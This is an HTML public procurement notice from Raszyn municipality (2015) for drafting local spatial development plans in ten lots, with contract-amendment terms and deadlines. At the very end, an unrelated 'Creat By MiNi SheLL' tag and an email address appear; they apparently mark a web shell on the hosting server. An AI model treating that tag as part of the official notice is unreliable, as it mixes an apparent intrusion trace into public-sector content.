1. Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy. 
Dopuszczalne są zmiany postanowień umowy oraz określenie warunków zmian w przypadku: 
1.	w przypadku przewidzianym w art. 19 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (j. t. Dz. U. z 2015 r., poz. 199 ze zm.) - termin wykonania przedmiotu umowy ulegnie przedłużeniu o czas niezbędny do ponowienia czynności, o których mowa w art. 17, w zakresie niezbędnym do dokonania tych zmian,
2.	w razie przedłużającego się postępowania administracyjnego o udzielenie uzgodnienia, zgody, opinii, porozumienia bądź przedłużającego się postępowania, które kończy się wydaniem decyzji administracyjnej - termin wykonania przedmiotu umowy przedłuża się o czas odpowiadający długości przedłużającego się postępowania, w stosunku do przewidzianego przepisami prawa,
3.	w przypadku niepodjęcia uchwały przez Radę Gminy w terminie 60 dni od dnia przekazania projektu uchwały - termin wykonania przedmiotu umowy przedłuża się o czas odpowiadający długości przedłużającej się procedury legislacyjnej uchwalenia planu przez Radę Gminy,
4.	w razie zmiany stanu prawnego w zakresie dotyczącym przedmiotu umowy - termin wykonania przedmiotu umowy przedłuża się o czas niezbędny na wprowadzenie tych zmian,
5.	w przypadku wystąpienia usług objętych zamówieniami dodatkowymi, które będą miały wpływ na zachowanie terminu zamówienia podstawowego - termin wykonania zamówienia podstawowego zostanie wydłużony o czas niezbędny na wykonanie zamówienia dodatkowego.
Zamawiający dopuszcza zmiany zapisów umowy, również w przypadku:
1). zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w opisie przedmiotu zamówienia, 
2). zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. 
3). zmiany obowiązującej stawki VAT - jeżeli zmiana ta będzie powodować zwiększenie kosztów po stronie Wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku zapłaconego przez Wykonawcę, 
4). zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy. 
Nie stanowi zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych: 
a). zmiana danych związanych z obsługą administracyjno-organizacyjną umowy np. zmiana rachunku bankowego, 
b). zmiana danych teleadresowych, zmiany osób wykazanych do kontaktów między stronami. 
2.Wszelkie zmiany postanowień niniejszej Umowy wymagają zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.raszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 05-090 Raszyn, ul. Szkolna 2a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2015 godzina 10:30, miejsce: siedziba Zamawiającego:
05-090 Raszyn, ul. Szkolna 2a
parter - Biuro Obsługi Mieszkańców - pokój 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Raszyn 01 - rejon Południowej Obwodnicy Warszawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1.
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Raszyn 01 - rejon Południowej Obwodnicy Warszawy. 
Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/59/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje miejscowy plan zagospodarowania przestrzennego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Wypędy w Gminie Raszyn - Obszar I..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/60/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Północno - wschodni obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego. 
Pozostały obszar objęty jest Miejscowym planem zagospodarowania przestrzennego części wsi Sękocin Stary, Sękocin Nowy, Janki, Falenty, wsi Wypędy, Puchały w dwóch etapach - Etap I (wieś Wypędy), zatwierdzonym uchwałą Nr XXXVI/623/04 Rady Gminy Raszyn z dnia 21 października 2004 r. (Dz. Urz. Woj. Maz. Nr 316, poz. 10404 z dnia 24 grudnia 2004 r.), zmienioną uchwałą Nr XII/176/07 Rady Gminy Raszyn z dnia 20 września 2007 r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6977 z dnia 25 listopada 2007 r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Wypędy w Gminie Raszyn - Obszar II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Nr VIII/61/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Północno - zachodni obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje miejscowy plan zagospodarowania przestrzennego. 
Pozostały obszar objęty jest Miejscowym planem zagospodarowania przestrzennego części wsi Sękocin Stary, Sękocin Nowy, Janki, Falenty, wsi Wypędy, Puchały w dwóch etapach - Etap I (wieś Wypędy), zatwierdzonym uchwałą Nr XXXVI/623/04 Rady Gminy Raszyn z dnia 21 października 2004 r. (Dz. Urz. Woj. Maz. Nr 316, poz. 10404 z dnia 24 grudnia 2004 r.), zmienioną uchwałą Nr XII/176/07 Rady Gminy Raszyn z dnia 20 września 2007 r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6977 z dnia 25 listopada 2007 r.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Janki w Gminie Raszyn - rejon ul. Sokołowskiej i ul. Wspólnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/62/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy w Gminie Raszyn - rejon Południowej Obwodnicy Warszawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/63/15 Rady  Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Jaworowa w Gminie Raszyn - rejon Południowej Obwodnicy Warszawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/64/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy Bankowe w Gminie Raszyn - rejon ul. Długiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/65/15 Rady  Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu objęty jest Miejscowym planem zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I, zatwierdzonym uchwałą Nr LIX/984/05 Rady Gminy Raszyn z dnia 27 października 2005r. (Dz. Urz. Woj. Maz. Nr 266, poz. 8713 z dnia 6 grudnia 2005r.), zmienioną Uchwałą Nr XII/175/07 Rady Gminy Raszyn z dnia 20 września 2007r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6976 z dnia 25 listopada 2007r.), zmienioną uchwałą Nr XLI/451/13 Rady Gminy Raszyn z dnia 26 września 2013r. (Dz. Urz. Woj. Maz., poz. 10595 z dnia 23 października 2013r.) w sprawie zmiany Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I - rejon rzeki Raszynki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy Bankowe w Gminie Raszyn - rejon ul. Warszawskiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/66/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu objęty jest Miejscowym planem zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I, zatwierdzonym uchwałą Nr LIX/984/05 Rady Gminy Raszyn z dnia 27 października 2005r. (Dz. Urz. Woj. Maz. Nr 266, poz. 8713 z dnia 6 grudnia 2005r.), zmienioną Uchwałą Nr XII/175/07 Rady Gminy Raszyn z dnia 20 września 2007r. (Dz. Urz. Woj. Maz. Nr 241, poz. 6976 z dnia 25 listopada 2007r.), zmienioną uchwałą Nr XLI/451/13 Rady Gminy Raszyn z dnia 26 września 2013r. (Dz. Urz. Woj. Maz., poz. 10595 z dnia 23 października 2013r.) w sprawie zmiany Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Dawidy, Dawidy Bankowe, Łady, Podolszyn Nowy - obszar I - rejon rzeki Raszynki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Falenty w Gminie Raszyn - rejon ul. Poniatowskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr VIII/67/15 Rady Gminy Raszyn z dnia 14 maja 2015 r.
Obszar wyznaczony do sporządzenia planu znajduje się na terenie, na którym nie obowiązuje  miejscowy plan zagospodarowania przestrzennego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10. 
Wykonanie Miejscowego planu zagospodarowania przestrzennego części terenów położonych we wsi Falenty Nowe w Gminie Raszyn - rejon ul. Grudzi i ul. Willowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obszar określony w załączniku mapowym nr 1 do uchwały Rady Gminy Raszyn Nr X/94/15 Rady Gminy Raszyn z dnia 30 czerwca 2015 r.
Obszar wyznaczony do sporządzenia planu objęty jest częściowo Miejscowym planem zagospodarowania przestrzennego dla obszaru położonego we wsi Falenty i Falenty Nowe w Gminie Raszyn - część III, zatwierdzonym uchwałą Nr VI/51/07 Rady Gminy Raszyn z dnia 8 marca 2007 r. (Dz. Urz. Woj. Maz. Nr 89, poz. 2140 z dnia 16 maja 2007 r.) oraz jest częściowo objęty Zmianą miejscowego planu zagospodarowania przestrzennego dla obszaru położonego we wsi Falenty i Falenty Nowe w Gminie Raszyn - część III -  Obszar 2 zatwierdzoną uchwałą Nr XLIX/817/10 Rady Gminy Raszyn z dnia 15 lipca 2010r. (Dz. Urz. Woj. Maz. Nr 160, poz. 3970 z dnia 6 września 2010r.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com